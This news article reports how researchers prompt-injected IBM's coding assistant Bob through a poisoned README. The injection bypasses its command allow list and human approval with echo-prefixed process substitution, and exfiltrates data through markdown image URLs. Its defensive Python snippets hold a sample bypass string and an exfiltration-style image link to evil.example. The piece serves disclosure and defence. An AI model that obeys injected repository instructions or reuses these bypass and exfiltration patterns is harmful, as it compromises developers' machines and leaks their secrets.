Researchers have found critical vulnerabilities in IBM's AI coding assistant Bob that let attackers bypass its security measures and execute malware on developers' machines.

IBM's experimental AI coding assistant Bob, currently in closed beta testing, contains critical security flaws that allow attackers to bypass its safeguards and execute malicious code on developers' machines. Security firm PromptArmor discovered that both Bob's command-line interface (CLI) and integrated development environment (IDE) versions are susceptible to prompt injection attacks that circumvent IBM's security protocols.

IBM markets Bob as an "AI software development partner that understands your intent, repo, and security standards." However, PromptArmor's testing reveals troubling gaps in these security claims. The vulnerabilities enable attackers to manipulate Bob into executing arbitrary shell commands, potentially leading to ransomware deployment, credential theft, or complete device compromise.

How the Attack Works



The exploit begins with a poisoned repository containing a malicious README.md file. When Bob analyzes the repository, the attacker's hidden instructions command Bob to conduct "phishing training" using terminal commands. Initial harmless echo commands lull users into approving permissions, after which Bob executes dangerous commands masked within the workflow.

Screenshot showing Bob CLI vulnerability (Source: PromptArmor)

IBM's documentation acknowledges risks in automatically approving high-risk commands, recommending allow lists and manual approvals for sensitive operations. Yet PromptArmor demonstrated how attackers bypass these defenses:

- Process Substitution Bypass: Bob blocks command substitution ($(command)) but fails to detect process substitution, allowing command execution

- Command Chaining Exploit: Attackers prefix malicious commands with allowed echo commands and chain them using > redirection operators

- Approval System Failure: The "human in the loop" approval only validates the initial safe command while hidden malicious commands execute without scrutiny
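To illustrate why a prefix-only allow list is not enough, here is a minimal Python sketch. It is not Bob's actual validation code, which the researchers describe only as minified JavaScript. The function names, the allow list, and the list of risky tokens are all hypothetical. The sketch contrasts a check that looks only at the first word of a command with a stricter one that refuses any command containing shell metacharacters, including the bash process substitution forms <(...) and >(...).

```python
import shlex

# Hypothetical allow list: only "echo" may run without extra review.
ALLOWED_COMMANDS = {"echo"}

# Shell constructs that can start another command or redirect output.
# Illustrative only; this is not an exhaustive list.
RISKY_TOKENS = ("$(", "`", "<(", ">(", ";", "&", "|", ">", "<", "\n")


def naive_is_allowed(command: str) -> bool:
    """Prefix-only check: inspects the first word and nothing else."""
    parts = command.strip().split()
    return bool(parts) and parts[0] in ALLOWED_COMMANDS


def strict_is_allowed(command: str) -> bool:
    """Reject any shell metacharacter, then check the program name."""
    if any(token in command for token in RISKY_TOKENS):
        return False
    try:
        argv = shlex.split(command)
    except ValueError:
        # Unbalanced quotes: refuse rather than guess at the meaning.
        return False
    return bool(argv) and argv[0] in ALLOWED_COMMANDS


if __name__ == "__main__":
    # The string is only inspected here, never executed.
    payload = "echo training > >(sh -c 'id')"
    print(naive_is_allowed(payload))   # passes the prefix-only check
    print(strict_is_allowed(payload))  # rejected by the stricter check
```

The strict check is deliberately conservative: it also rejects harmless commands that merely quote a > character. For an agent running with the developer's privileges, failing closed and asking for manual review is usually the safer trade-off.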

Real-World Impact

Shankar Krishnan, PromptArmor's managing director, explained the severity: "The 'human in the loop' approval function only validates an allow-listed safe command while more sensitive commands run undetected." This vulnerability could be triggered through multiple vectors:

- Reading compromised webpages or developer documentation

- Processing untrusted StackOverflow answers

- Analyzing outputs from third-party tools

Developers working with open-source repositories are particularly vulnerable. A single poisoned dependency could grant attackers full system access.

Technical Breakdown



Screenshot of vulnerable JavaScript code in Bob's implementation

The core vulnerability lies in Bob's command validation logic. Researchers identified flawed sanitization in minified JavaScript code where:

- Input filtering fails to handle nested command structures

- Context separation between trusted/untrusted data isn't enforced

- Markdown rendering allows data exfiltration via image pre-fetching

PromptArmor also confirmed the IDE version is vulnerable to zero-click data exfiltration attacks through markdown rendering vulnerabilities.
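Markdown image exfiltration works because a renderer fetches an image URL automatically, and that URL can carry stolen data in its path or query string. The Python sketch below shows one possible mitigation: removing remote images from untrusted Markdown before it is rendered. It is an assumption-laden illustration, not IBM's fix. The function name and regular expression are hypothetical, and the pattern covers only inline images of the form ![alt](url), not reference-style images or raw HTML img tags.

```python
import re
from urllib.parse import urlparse

# Matches inline Markdown images: ![alt](url) or ![alt](url "title").
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")


def strip_remote_images(markdown: str) -> str:
    """Replace images that point at a remote host with a text placeholder."""

    def replace(match: "re.Match[str]") -> str:
        alt, url = match.group(1), match.group(2)
        parsed = urlparse(url)
        # A scheme (https:, data:, ...) or a network location (//host/...)
        # means the renderer would fetch something beyond a relative path.
        if parsed.scheme or parsed.netloc:
            return f"[image removed: {alt}]"
        return match.group(0)

    return IMAGE_PATTERN.sub(replace, markdown)


if __name__ == "__main__":
    untrusted = "Build status: ![x](https://evil.example/p.png?d=SECRET)"
    print(strip_remote_images(untrusted))
```

Relative paths such as image-1.png are left untouched, so local documentation still renders. A production renderer would more likely enforce this with a content security policy or a host allow list than with a regular expression.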

Industry Implications

This discovery highlights systemic challenges in AI agent security:

- Overreliance on Approval Systems: Human oversight fails when users can't see full command context

- Incomplete Input Sanitization: Partial command validation creates false security

- Expanded Attack Surface: AI agents' ability to interact with systems multiplies exploit vectors

IBM responded: "Bob is currently in tech preview... We take security seriously and will take appropriate remediation steps prior to general availability." However, the company said it had not been notified of these findings prior to publication.

As AI coding assistants approach mainstream adoption, this incident underscores the urgent need for:

- Rigorous adversarial testing before release

- Defense-in-depth approaches beyond simple allow lists

- Standardized security frameworks for AI agent development

Developers testing Bob should immediately:

- Avoid auto-approving any commands

- Restrict Bob's access to sensitive systems

- Monitor all executed commands in terminal sessions
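As a rough illustration of the first and third recommendations, the Python sketch below wraps command execution so that the reviewer sees the complete command, every decision is logged, and nothing passes through a shell. It is a hypothetical wrapper, not a feature of Bob. The function name, the logger name, and the prompt wording are assumptions made for the example.

```python
import logging
import shlex
import subprocess
from typing import Callable, Optional, Sequence

# Hypothetical logger name; configure handlers to suit your environment.
logger = logging.getLogger("agent_commands")


def run_with_approval(
    argv: Sequence[str],
    confirm: Callable[[str], str] = input,
) -> Optional[subprocess.CompletedProcess]:
    """Show the full command, ask for approval, log the decision, then run it."""
    rendered = shlex.join(argv)
    answer = confirm(f"Run this exact command? {rendered!r} [y/N] ")
    if answer.strip().lower() != "y":
        logger.info("DENIED %s", rendered)
        return None
    logger.info("APPROVED %s", rendered)
    # shell=False: argv goes straight to the program, so characters such as
    # > or $( inside an argument are never interpreted by a shell.
    return subprocess.run(
        list(argv), shell=False, capture_output=True, text=True, check=False
    )


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    result = run_with_approval(["echo", "hello > not-a-redirect"])
    if result is not None:
        print(result.stdout, end="")
```

Because the command is passed as an argument list, what the reviewer approves is exactly what runs. That is the property the article says was missing when only the allow-listed prefix was validated.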

The full technical analysis is available in PromptArmor's research report. IBM's Bob documentation can be reviewed at IBM's official Bob page.
